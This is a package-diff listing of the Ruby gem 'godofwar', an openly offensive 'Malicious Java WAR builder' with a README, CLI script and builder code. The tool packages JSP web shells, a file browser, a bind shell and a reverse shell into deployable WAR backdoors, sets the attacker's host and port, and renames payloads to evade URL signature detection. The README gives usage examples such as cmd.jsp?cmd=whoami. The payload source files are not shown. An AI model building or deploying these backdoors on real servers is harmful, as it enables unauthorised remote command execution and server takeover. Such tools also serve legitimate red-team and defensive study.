godofwar 0.1.1

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: cad770ac51b330105ebdebed6020e46fe9389e1a5b7585921b7541c34178b0b0
4
+ data.tar.gz: 99bd5b547ce8c0f1cd9c3363aa503d3243f32e6d94ae15933163f35b07b71bee
5
+ SHA512:
6
+ metadata.gz: 9fac4faf7bf2cbd79f2498c858a288e8548aac1d01e14d5fee6b799c5930216baabe4e2d96ca6aaa1d58cc6a230d29635ae8964b399f4c3c8247f552f07df53c
7
+ data.tar.gz: 13dc0ed6aadb81cafe8c211e288f312339bc164a5ffafbf716a6d1a9da83ec57550f3c256153b1390a2a739684927a304c2c23ff6ad06590f40d5964c5244b6b
@@ -0,0 +1,74 @@
1
+ # Contributor Covenant Code of Conduct
2
+
3
+ ## Our Pledge
4
+
5
+ In the interest of fostering an open and welcoming environment, we as
6
+ contributors and maintainers pledge to making participation in our project and
7
+ our community a harassment-free experience for everyone, regardless of age, body
8
+ size, disability, ethnicity, gender identity and expression, level of experience,
9
+ nationality, personal appearance, race, religion, or sexual identity and
10
+ orientation.
11
+
12
+ ## Our Standards
13
+
14
+ Examples of behavior that contributes to creating a positive environment
15
+ include:
16
+
17
+ * Using welcoming and inclusive language
18
+ * Being respectful of differing viewpoints and experiences
19
+ * Gracefully accepting constructive criticism
20
+ * Focusing on what is best for the community
21
+ * Showing empathy towards other community members
22
+
23
+ Examples of unacceptable behavior by participants include:
24
+
25
+ * The use of sexualized language or imagery and unwelcome sexual attention or
26
+ advances
27
+ * Trolling, insulting/derogatory comments, and personal or political attacks
28
+ * Public or private harassment
29
+ * Publishing others' private information, such as a physical or electronic
30
+ address, without explicit permission
31
+ * Other conduct which could reasonably be considered inappropriate in a
32
+ professional setting
33
+
34
+ ## Our Responsibilities
35
+
36
+ Project maintainers are responsible for clarifying the standards of acceptable
37
+ behavior and are expected to take appropriate and fair corrective action in
38
+ response to any instances of unacceptable behavior.
39
+
40
+ Project maintainers have the right and responsibility to remove, edit, or
41
+ reject comments, commits, code, wiki edits, issues, and other contributions
42
+ that are not aligned to this Code of Conduct, or to ban temporarily or
43
+ permanently any contributor for other behaviors that they deem inappropriate,
44
+ threatening, offensive, or harmful.
45
+
46
+ ## Scope
47
+
48
+ This Code of Conduct applies both within project spaces and in public spaces
49
+ when an individual is representing the project or its community. Examples of
50
+ representing a project or community include using an official project e-mail
51
+ address, posting via an official social media account, or acting as an appointed
52
+ representative at an online or offline event. Representation of a project may be
53
+ further defined and clarified by project maintainers.
54
+
55
+ ## Enforcement
56
+
57
+ Instances of abusive, harassing, or otherwise unacceptable behavior may be
58
+ reported by contacting the project team at king.sabri@gmail.com. All
59
+ complaints will be reviewed and investigated and will result in a response that
60
+ is deemed necessary and appropriate to the circumstances. The project team is
61
+ obligated to maintain confidentiality with regard to the reporter of an incident.
62
+ Further details of specific enforcement policies may be posted separately.
63
+
64
+ Project maintainers who do not follow or enforce the Code of Conduct in good
65
+ faith may face temporary or permanent repercussions as determined by other
66
+ members of the project's leadership.
67
+
68
+ ## Attribution
69
+
70
+ This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71
+ available at [http://contributor-covenant.org/version/1/4][version]
72
+
73
+ [homepage]: http://contributor-covenant.org
74
+ [version]: http://contributor-covenant.org/version/1/4/
data/Gemfile ADDED
@@ -0,0 +1,4 @@
1
+ source "https://rubygems.org"
2
+
3
+ # Specify your gem's dependencies in godofwar.gemspec
4
+ gemspec
data/Gemfile.lock ADDED
@@ -0,0 +1,19 @@
1
+ PATH
2
+ remote: .
3
+ specs:
4
+ godofwar (0.1.1)
5
+ rubyzip
6
+
7
+ GEM
8
+ remote: https://rubygems.org/
9
+ specs:
10
+ rubyzip (1.2.2)
11
+
12
+ PLATFORMS
13
+ ruby
14
+
15
+ DEPENDENCIES
16
+ godofwar!
17
+
18
+ BUNDLED WITH
19
+ 2.0.1
data/README.md ADDED
@@ -0,0 +1,132 @@
1
+ # GodOfWar - Malicious Java WAR builder
2
+ A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
3
+
4
+ ```
5
+ .
6
+ hhh
7
+ hhhhhhh
8
+ hhhhhhhh
9
+ hhhhhhhh+
10
+ hhhhhhhh'
11
+ hhhhhhhh.
12
+ hhhhhhhhh
13
+ ..-- hhhhhhhhh
14
+ -sh/.. +. hhhhhhhhh:
15
+ /+/:-/+ss-` hhhhhhhhhh:
16
+ /MMM`ss:``.` hhhhhhhhhh:
17
+ .MMMMM: hhhhhhhhhhhhhhhhh:
18
+ MMMMMMM: hhhhhhhhhhhhhhhh:
19
+ MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
20
+ :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
21
+ ./:`smdo+oos++- `++sNMMMMMNmh+
22
+ .-y-` ` :. / -dmddhhhhh-
23
+ o/- `//o/ /M/ `+hhhhhhhh`
24
+ /o :yosmy +y .`.hhhhhhhho
25
+ +` /../.: `.y::hhhhhs:`
26
+ ` `+yys` .sy` /oohhy:
27
+ `/:s/-`` `.hh`
28
+ ..` ` y+
29
+ .hNNmmNdymmmmds` :-
30
+ hs. ``.. :y- `
31
+ -hhmNmddm+ .
32
+ `NMMMMMMm
33
+ ` `oMMy
34
+ `. /Md- :o
35
+ MMMMMMMMMMMMMMMMMMM:
36
+ MMMMMMMMMMMMMMMMMM:
37
+ MMMMMMMMMMMMMMMMM
38
+ MMMMMMMMMMMMMMM.
39
+ `MMMMMMMMMMMMM.
40
+ :sNMMMNMdo:
41
+ ``+m:/-
42
+ `
43
+ GodOfWar - Malicious Java WAR builder.
44
+ ```
45
+
46
+ ## Features
47
+
48
+ - Preexisting payloads. (try `-l/--list`)
49
+ - cmd_get
50
+ - filebrowser
51
+ - bind_shell
52
+ - reverse_shell_ui
53
+ - Configurable backdoor. (try `--host/-port`)
54
+ - Control over payload name.
55
+ - To avoid malicious name after deployment to bypass URL name signatures.
56
+
57
+ ## Installation
58
+
59
+ ```
60
+ $ gem install godofwar
61
+ ```
62
+
63
+ ## Usage
64
+ ```
65
+ $ godofwar -h
66
+
67
+ Help menu:
68
+ -p, --payload PAYLOAD Generates war from one of the available payloads.
69
+ (check -l/--list)
70
+ -H, --host IP_ADDR Local or Remote IP address for the chosen payload
71
+ (used with -p/--payload)
72
+ -P, --port PORT Local or Remote Port for the chosen payload
73
+ (used with -p/--payload)
74
+ -o, --output [FILE] Output file and the deployment name.
75
+ (default is the payload original name. check '-l/--list')
76
+ -l, --list list all available payloads.
77
+ -h, --help Show this help message.
78
+ ```
79
+
80
+ ### Example
81
+
82
+ **List all payloads**
83
+ ```
84
+ $ godofwar -l
85
+ ├── cmd_get
86
+ │   └── Information:
87
+ │ ├── Description: Command execution via web interface
88
+ │ ├── OS: any
89
+ │ ├── Settings: {"false"=>"No Settings required!"}
90
+ │ ├── Usage: http://host/cmd.jsp?cmd=whoami
91
+ │ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
92
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/cmd_get
93
+ ├── filebrowser
94
+ │   └── Information:
95
+ │ ├── Description: Remote file browser, upload, download, unzip files and native command execution
96
+ │ ├── OS: any
97
+ │ ├── Settings: {"false"=>"No Settings required!"}
98
+ │ ├── Usage: http://host/filebrowser.jsp
99
+ │ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
100
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/filebrowser
101
+ ├── bind_shell
102
+ │   └── Information:
103
+ │ ├── Description: TCP bind shell
104
+ │ ├── OS: any
105
+ │ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
106
+ │ ├── Usage: http://host/reverse-shell.jsp
107
+ │ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
108
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/bind_shell
109
+ ├── reverse_shell_ui
110
+ │   └── Information:
111
+ │ ├── Description: TCP reverse shell with a UI to set LHOST and LPORT from browser.
112
+ │ ├── OS: windows
113
+ │ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
114
+ │ ├── Usage: http://host/reverse_shell_ui.jsp
115
+ │ ├── References: []
116
+ │ └── Local Path: /FULL/PATH/HERE/godofwar/payloads/reverse_shell_ui
117
+ ```
118
+
119
+ **Generate payload with LHOST and LPORT**
120
+ ```
121
+ godofwar -p reverse_shell_ui -H 192.168.100.10 -P 9911 -o puppy
122
+ ```
123
+
124
+ ## Contributing
125
+
126
+ Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/godofwar.
127
+
128
+
129
+ ## License
130
+
131
+ The gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).
132
+
data/Rakefile ADDED
@@ -0,0 +1,2 @@
1
+ require "bundler/gem_tasks"
2
+ task :default => :spec
data/bin/godofwar ADDED
@@ -0,0 +1,77 @@
1
+ #!/usr/bin/env ruby
2
+ #
3
+ # GodOfWare - A command-line tool to generate war payloads for penetration testing / red teaming purposes.
4
+ # @Author: KING SABRI - @KINGSABRI
5
+ #
6
+ lib = File.expand_path("../../lib", __FILE__)
7
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
8
+ require 'godofwar'
9
+
10
+ options = OpenStruct.new(payload: nil, host: nil, port: nil,
11
+ list: false, output: nil, version: false)
12
+
13
+ option_parser = OptionParser.new
14
+ option_parser.banner = "#{"GodOfWar".bold} - Malicious Java WAR builder."
15
+ option_parser.set_summary_indent ' '
16
+ option_parser.separator "\nHelp menu:".underline
17
+ option_parser.on('-p', '--payload PAYLOAD',
18
+ 'Generates war from one of the available payloads.',
19
+ "\t(check -l/--list)"
20
+ ) {|v| options.payload = v}
21
+
22
+ option_parser.on('-H', '--host IP_ADDR',
23
+ 'Local or Remote IP address for the chosen payload',
24
+ "\t(used with -p/--payload)"
25
+ ) {|v| options.host = v}
26
+ option_parser.on('-P', '--port PORT', Integer,
27
+ 'Local or Remote Port for the chosen payload',
28
+ "\t(used with -p/--payload)"
29
+ ) {|v| options.port = v}
30
+ option_parser.on('-o', "--output [FILE]",
31
+ 'Output file and the deployment name.',
32
+ "\t(default is the payload original name. check '-l/--list')") do |v|
33
+ options.output = v
34
+ end
35
+ option_parser.on('-l', '--list', 'list all available payloads.') { |v| options.list = v }
36
+ option_parser.on('-h', '--help', 'Show this help message') {puts GodOfWar::Utils.banner , option_parser; exit!}
37
+
38
+ begin
39
+ option_parser.parse!(ARGV)
40
+ payloads = GodOfWar::Payloads.new
41
+
42
+ case
43
+ when options.list
44
+ puts payloads.list_tree
45
+ when options.payload
46
+ payload = payloads.find_payload(options.payload)
47
+
48
+ if payload.nil?
49
+ puts "Unknown Payload: check available payloads using '-l/--list' option.".warn
50
+ exit!
51
+ end
52
+
53
+ GodOfWar::Builder.new(payload) do |build|
54
+ build.output = options.output
55
+ build.directory_structure
56
+ build.web_xml
57
+ build.manifest_mf
58
+ build.set_payload(options.host, options.port)
59
+ build.war
60
+ end
61
+
62
+ else
63
+ puts GodOfWar::Utils.banner
64
+ puts option_parser
65
+ end
66
+ rescue OptionParser::MissingArgument => e
67
+ e.args.each { |arg| puts "#{e.reason.capitalize} for '#{arg}' option.".error }
68
+ puts option_parser
69
+ rescue OptionParser::InvalidOption => e
70
+ puts "#{e}".error
71
+ puts option_parser
72
+ rescue Exception => e
73
+ puts "Unknown Exception".error
74
+ puts 'Please report the issue at: https://github.com/KINGSABRI/godofwar/issues'.warn
75
+ puts e.full_message
76
+ puts "#{e}".error
77
+ end
data/godofwar.gemspec ADDED
@@ -0,0 +1,26 @@
1
+
2
+ lib = File.expand_path("../lib", __FILE__)
3
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
4
+ require "godofwar/version"
5
+
6
+ Gem::Specification.new do |spec|
7
+ spec.name = "godofwar"
8
+ spec.version = GodOfWar::VERSION
9
+ spec.authors = ["KINGSABRI"]
10
+ spec.email = ["king.sabri@gmail.com"]
11
+
12
+ spec.summary = %q{Evil war builder for hackers with built-in war payloads.}
13
+ spec.description = %q{Evil war builder for hackers with built-in war payloads.}
14
+ spec.homepage = "https://github.com/KINGSABRI/godofwar"
15
+ spec.license = "MIT"
16
+
17
+ spec.files = Dir.glob("**/*")
18
+ spec.bindir = "bin"
19
+ spec.executables = ["godofwar"]
20
+ spec.require_paths = ["lib"]
21
+
22
+ spec.add_dependency 'rubyzip'
23
+
24
+ spec.metadata["homepage_uri"] = spec.homepage
25
+ spec.metadata["source_code_uri"] = "https://github.com/KINGSABRI/godofwar"
26
+ end
data/lib/godofwar.rb ADDED
@@ -0,0 +1,20 @@
1
+ # Standard libraries
2
+ require 'optparse'
3
+ require 'ostruct'
4
+ require 'json'
5
+ require 'fileutils'
6
+
7
+ # GodOfWar
8
+ require 'godofwar/version'
9
+ require 'godofwar/builder'
10
+ require 'godofwar/payloads'
11
+ require 'godofwar/extensions'
12
+ require 'godofwar/utils'
13
+
14
+ # Gems
15
+ require 'zip'
16
+
17
+ module GodOfWar
18
+ class Error < StandardError; end
19
+ String.class_eval { include Extensions::Core::String }
20
+ end
@@ -0,0 +1,137 @@
1
+ #
2
+ # KING SABRI | @KINGSABRI
3
+ #
4
+ module GodOfWar
5
+ #
6
+ # Builder module responsible for building base files around GodOfWar
7
+ # ├── cmd_get.jsp
8
+ # ├── META-INF
9
+ # │   └── MANIFEST.MF
10
+ # │ Manifest-Version: 1.0
11
+ # │ Created-By: 1.6.0_10 (Sun Microsystems Inc.)
12
+ # └── WEB-INF
13
+ # └── web.xml
14
+ #
15
+ class Builder
16
+ attr_accessor :output
17
+
18
+ def initialize(payload)
19
+ @output = nil
20
+ @payload = payload
21
+ yield self
22
+ end
23
+
24
+ def directory_structure
25
+ if @output
26
+ @war_dir = @output
27
+ else
28
+ @war_dir = @payload.name
29
+ @output = @payload.name
30
+ end
31
+
32
+ @output = @output? @output : @payload.name
33
+ rename_if_exists("#{@war_dir}.war")
34
+ puts "Creating Directory Structure:".tell
35
+ FileUtils.mkdir_p(File.join(@war_dir, 'WEB-INF'))
36
+ FileUtils.mkdir_p(File.join(@war_dir, 'META-INF'))
37
+ puts "#{@war_dir}".step_success
38
+ puts File.join(@war_dir, 'WEB-INF').step_success
39
+ puts File.join(@war_dir, 'META-INF').step_success
40
+ end
41
+
42
+ # WEB-INF
43
+ #
44
+ # web_xml builds 'web.xml' file for a given jsp file
45
+ #
46
+ # @return [String]
47
+ #
48
+ def web_xml
49
+ web_xml_path = File.join(@war_dir, 'WEB-INF', 'web.xml')
50
+ web_xml = <<~WEBXML
51
+ <?xml version="1.0" ?>
52
+ <web-app xmlns="http://java.sun.com/xml/ns/j2ee"
53
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
54
+ xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
55
+ http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
56
+ version="2.4">
57
+ <servlet>
58
+ <servlet-name>#{@output.capitalize}</servlet-name>
59
+ <jsp-file>/#{@output}.jsp</jsp-file>
60
+ </servlet>
61
+ </web-app>
62
+ WEBXML
63
+
64
+ File.write(web_xml_path, web_xml)
65
+ puts "#{web_xml_path}".step_success
66
+ end
67
+
68
+ # web_xml builds 'MANIFEST.MF' file for a given jsp file
69
+ #
70
+ # @return [String]
71
+ #
72
+ def manifest_mf
73
+ manifest_mf_path = File.join(@war_dir, 'META-INF', 'MANIFEST.MF')
74
+ manifest_mf =
75
+ <<~MANIFEST
76
+ Manifest-Version: 1.0
77
+ Created-By: 1.6.0_10 (Sun Microsystems Inc.)
78
+ MANIFEST
79
+
80
+ File.write(manifest_mf_path, manifest_mf)
81
+ puts "#{File.join(@war_dir, 'META-INF', 'MANIFEST.MF')}".step_success
82
+ end
83
+
84
+ def set_payload(host, port)
85
+ payload_file = File.join(@payload.path, "#{@payload.name}.jsp")
86
+
87
+ if @payload.conf.empty?
88
+ payload_raw = File.read(payload_file)
89
+ else
90
+ host = host.nil? ? @payload.conf["host"] : host
91
+ port = port.nil? ? @payload.conf["host"] : port
92
+ payload_raw = File.read(payload_file)
93
+ .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
94
+ end
95
+ File.write(File.join(@output, "#{@output}.jsp"), payload_raw)
96
+ puts "Setting up payload:".tell
97
+ puts "#{File.join(@war_dir, @payload.name)}.jsp".step_success
98
+ end
99
+
100
+ # build_war build the WAR file by recursively the source directory content then zip it
101
+ def war
102
+ final_war = "#{@output}.war"
103
+ Zip::File.open(final_war, Zip::File::CREATE) do |zip|
104
+ Dir.glob("#{@war_dir}/**/*" ).each do |file|
105
+ zip.add(file.sub(@output, '').sub(/[\/|\\]/, ''), file)
106
+ end
107
+ end
108
+ puts "Cleaning up".tell
109
+ FileUtils.rm_rf(@war_dir)
110
+ puts "Backdoor ".done + "#{@output}.war".bold + " has been created."
111
+ end
112
+
113
+ private
114
+
115
+ # check if the war file exists, rename it if true.
116
+ def rename_if_exists(file)
117
+ if File.exist? file
118
+ rename = "#{file}_#{Time.now.to_i}"
119
+ puts "File '#{file}' exists".warn
120
+ puts "Renamed '#{file}' to '#{rename}'".tell
121
+ FileUtils.mv(file, rename, force: true)
122
+ end
123
+ end
124
+
125
+ end
126
+ end
127
+
128
+ if __FILE__ == $0
129
+ payload = 'reverse_shell_ui'
130
+ GodOfWar::Builder.new(payload) do |build|
131
+ # p build.structure
132
+ # p build.web_xml
133
+ puts build.payload('1.1.1.1', 4444)
134
+ p build.default
135
+ # p build.war
136
+ end
137
+ end